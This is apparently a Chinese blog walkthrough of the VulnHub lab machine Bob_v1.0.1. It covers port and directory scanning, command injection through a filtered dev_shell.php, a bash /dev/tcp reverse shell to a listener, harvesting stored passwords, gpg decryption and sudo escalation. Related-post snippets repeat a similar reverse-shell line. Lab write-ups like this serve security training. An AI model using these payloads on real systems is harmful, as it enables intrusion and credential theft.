Bob_v1.0.1靶机

于 2024-08-07 18:46:03 发布
阅读量284 收藏 1
点赞数 15
文章标签: 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hqy250019/article/details/140998897
版权

IP扫描

端口扫描

nmap -p- -A 192.168.111.142

目录扫描

dirsearch -u  http://192.168.111.142

拼接一下扫描的目录没啥发现,一个robots文件,看看内容

访问了半天,发现只有/dev_shell.php有用,是一个命令执行的页面

dev_shell.php页面发现存在过滤,一些命令无法执行,执行whoami | ls,发现一个备份文件

通过访问页面直接下载下来,查看文件内容,看到过滤了一些命令

http://192.168.111.142/dev_shell.php.bak

直接尝试反弹shell

nc -lvnp 4444

浏览器执行,反弹成功

whoami | pwd&echo "bash -i >& /dev/tcp/192.168.111.147/4444 0>&1" | bash

提权

cd到home目录下,查看,发现有四个用户的家目录,先到bob目录下查看,发现一个可能存在密码的文件.old_passwordfile.html

cd /home 
ls
cd bob
ls -al

查看文件,得到 jc 和 seb 的密码

cat .old_passwordfile.html
jc:Qwerty
seb:T1tanium_Pa$$word_Hack3rs_Fear_M3

在 Documents 下发现一个加密的文件 login.txt.gpg 和一个目录 Secret

cd Documents
ls

在 /home/bob/Documents/Secret/Keep_Out/Not_Porn/No_Lookie_In_Here 下,发现了 notes.sh

查看文件内容,没看懂,网上搜了一下,是藏头诗,密钥为 HARPOCRATES

返回DOcuments目录下,解密 login.txt.gpg ,没有权限

gpg -d login.txt.gpg

ssh登录其他用户尝试

ssh jc@192.168.111.142 -p 25468
Qwerty

再次解密,得到 bob 的密码

cd /home/bob/Documents
gpg --batch --passphrase HARPOCRATES -d login.txt.gpg
 
bob:b0bcat_

再看看 elliot 的家目录,发现一个 theadminisdumb.txt 文件

查看内容,这里提到他把密码改为了 theadminisdumb

ssh连接bob用户

ssh bob@192.168.111.142 -p 25468
b0bcat_

查看当前权限,显示为all,所有命令都可以

sudo -l

直接sudo su 提权成功

sudo su

陽陽yy
关注
  • 15
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
DSVideo_Go_v1.0.1.apk
08-02
安装AndroidTV版的群晖官方DSVideo之后桌面上不生成图标,这个apk就是一个引导程序,安装这个apk之后,桌面上出现DSVideo的图标,点击后引导启动官方DSVideo。
I2C_Timing_Configuration_V1.0.1.xls
08-24
stm32f0硬件I2C_Timing配置工具,来源ST官网:...
vulnhub靶场,Bob_v1.0.1
m0_63755076的博客
09-27 479
但是发现好像没有读取成功,可能是这个命令解释器的问题,使用python生成一个交互式的shell再次查看。发现里面有jc用户和seb用户的密码,先不适用ssh进行连接,看看他们的家目录里面有什么。说什么ftp的后门,也没搞懂他说的的意思,还有一个gpg文件,但是想要解密就需要拿到密钥。发现是一个学校的官网,查看一下基本内容发现没有什么发现,大概的内容就是学校的网站被黑了。分别访问这几个页面看看都有什么发现,当我们访问这个页面的时候,发现可能是一个命令行。成功获得bob用户的密码,切换为bob用户。
BOB_1.0.1靶机详解
weixin_44681307的博客
07-29 351
然后我们在elliot的家目录发现一个txt文件,打开后发现里面有他的密码,也有James用户的密码。找到ip地址后对IP进行一个单独的扫描,发现ssh端口被改到25468了,等会儿登陆时候需要用到。但是关键词被过滤了,我们在ls中级加两个反斜线就发现可以使用ls命令,下面信息有反馈。然后make一下.c文件,这样就出来一个可执行文件,执行后就拿到了root权限。其实几个用户都是一样的,这个靶机并没有什么能利用的点,但是内核漏洞可以利用。wget过来,file一下发现是一个zip文件,我们解压一下。
Vulnhub靶机Bob_v1.0.1 writeup
xingjinhao123的博客
02-18 2989
下载地址:https://www.vulnhub.com/entry/bob-101,226/ 信息搜集 扫描IP地址 扫描端口及端口信息 访问80端口并没有发现有用的信息 扫描目录 看到有熟悉的robots.txt,访问看一下 发现了dev_shell.php,可以执行一些简单的命令,但是不能执行ls,ifconfig,pwd等命令 getshell bash反弹shell bash -c 'exec bash -i &>/dev/tcp/192.168.1.140/4444 &
Bob_v1.0.1靶机渗透测试
weixin_58786230的博客
08-03 275
【代码】Bob_v1.0.1靶机渗透测试。
【vulnhub靶场】Bob_v1.0.1靶机提权
qq_46421742的博客
07-29 247
免责声明:本文属于个人笔记,仅用于学习,禁止使用于任何违法行为,任何违法行为与本人无关。
vulnbub系列:Bob_v1.0.1
jq_j37的博客
08-03 312
vulnbub系列:Bob_v1.0.1靶机,打靶文章
VulnHub:Bob 1.0.1靶机实战
Aukum的博客
07-08 783
VulnHub-Bob 1.0.1靶机。通过常规信息收集,借助&符号绕过过滤,通过命令执行进行反弹shell。主要考察的是Linux shell基础和信息收集能力。
记:渗透测试-靶机训练Bob1.0.1
Anderlos
06-24 934
前言 来CSDN划水有几年了,一直处于学习的状态,直到今天才发第一篇文章,就以基础渗透作为开篇吧,技术不到位还望大佬们手下留情,话不多说直接进入分享 首先请出靶机 靶机界面 然后进入kali(其实是为了分享一波桌面) 首先确定一点问题就是,我们需要知道对方IP地址是多少(因为是在虚拟机环境内所以注定IP地址不会太多,所以我们既已知在一个网段内,只需要扫描出这个网段的所有主机即可) ip addr 先通过ip addr来确认一下我们...
Bob:1.0.1靶机
最新发布
m0_65285254的博客
08-07 117
根据描述,这是一个学校的内部网站,并且为了防止黑客,设置了只能在内部访问,禁止外部登录。最后发现 notes.sh 文件中每段话的首字母连起来就是密码 HARPOCRATES。是来自Bob的留言,给出了一封信,教我们获取一个可以使用的 webshell。在/home/bob下找到.old_passwordfile.html文件。还是Bob的信息,通知说服务器上有一个没有受保护的 web shell。进入/home/bob/Documents目录,发现一个目录两个文件。访问/lat_memo.html。
TFT35_V1.0.1_中文
05-25
TFT35_V1.0.1_中文TFT35_V1.0.1_中文TFT35_V1.0.1_中文TFT35_V1.0.1_中文TFT35_V1.0.1_中文TFT35_V1.0.1_中文TFT35_V1.0.1_中文TFT35_V1.0.1_中文TFT35_V1.0.1_中文TFT35_V1.0.1_中文TFT35_V1.0.1_中文TFT35_V1.0.1_...
ZXDoc_x64_V1.0.1(20230515).exe.zip
07-12
ZXDoc_x64_V1.0.1(20230515).exe.zip 是一个压缩包文件,根据其命名格式,我们可以推断它包含的是ZXDoc软件的64位版本,版本号为1.0.1,发布日期为2023年5月15日。ZXDoc很可能是一款文档管理或者处理相关的应用程序...
I2C_Timing_Configuration_V1.0.1.zip
07-03
I2C timing configuration tool for STM32F3xx and STM32F0xx microcontrollers,STM32时钟配置工具,适用于STM32F3XX和STM32F0XX系列单片机。
尚硅谷谷粒商城项目笔记——四、使用docker安装redis【电脑CPU:AMD】
B6665X的博客
08-06 315
尚硅谷谷粒商城项目笔记——四、使用docker安装redis【电脑CPU:AMD】
OpenStack Yoga版安装笔记(十二)nova安装(下)
zkyqss的博客
08-03 732
在不支持硬件加速的传统硬件上,可以使用通用的QEMU hypervisor。另外可以通过简单修改这里的配置,增加额外的计算节点,从而水平扩展计算环境。计算服务(Compute Service)支持多种hypervisor来部署实例或虚拟机。为了简化配置,这里使用。在安装和配置compute service之前,需要先创建数据库、服务凭证(用户名/密码)、服务API端点。1、检查计算节点(compute node)是否支持硬件虚拟化,返回1或者大于1,则支持;当您添加新的计算节点时,您必须在控制节点上运行。
接口测试学习笔记1
weixin_53666393的博客
08-03 913
同时也像白盒测试那样,检查程序的代码,但这种检查不像白盒测试那样详细、完整,一般只对程序模块之间的调用、核心代码进行检查,在集成测试时经常采用,一般也是程序员大量采用。现在企业说的接口测试,一般指的是Web接口测试或Http接口测试,主要指的是基于B/S架构的接口测试(B/S架构主要基于HTTP 超文本传输协议,所以也叫HTTP接口测试)对请求对象(网页、文件、图片...)进行的操作,就是一些命令,程序员在编程的时候使用,在接口文档中会指明,测试人员测试接口的时候,按照说明选择正确的方法。
OSPF笔记
2301_78537542的博客
08-06 607
该表记录了与本地路由器建立了邻居关系的其他路由器的信息,包括邻居路由器的 Router ID、接口地址、状态、Hello 间隔、失效时间等。OSPF 路由器使用 Dijkstra 算法根据 LSDB 中的链路状态信息计算出到达各个目标网络的最短路径,并将这些路由信息放入路由表中,用于数据的转发决策。:为了保证网络的安全性和数据的完整性,OSPF 支持不同的认证方式。OSPF 网络被划分为不同的区域,路由器要成为邻居,必须处于相同的区域,这样它们才能共享相同的链路状态信息,以计算准确的路由。
hc32f030_ide_rev1.0.1
06-06
### 回答1: hc32f030_ide_rev1.0.1是一款集成开发环境(IDE),用于hc32f030系列单片机的开发。它由华大基础(HDP)公司开发,可用于Windows操作系统。hc32f030_ide_rev1.0.1提供了代码编辑、编译、调试等功能,支持多种编程语言,包括C语言和汇编语言。此外,它还支持多种单片机设备和外部模块、接口的配置,如ADC模块、串行通信模块等。hc32f030_ide_rev1.0.1采用图形化界面,用户可以直观地看到当前工程的结构,方便编写代码和调试程序。此外,hc32f030_ide_rev1.0.1还提供了丰富的API库,包括IO口操作、定时器操作、中断操作等,为用户开发的程序提供了丰富的工具和支持。综上所述,hc32f030_ide_rev1.0.1是一款方便、易用、功能强大的单片机开发工具,极大地提高了用户的开发效率和程序运行的可靠性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值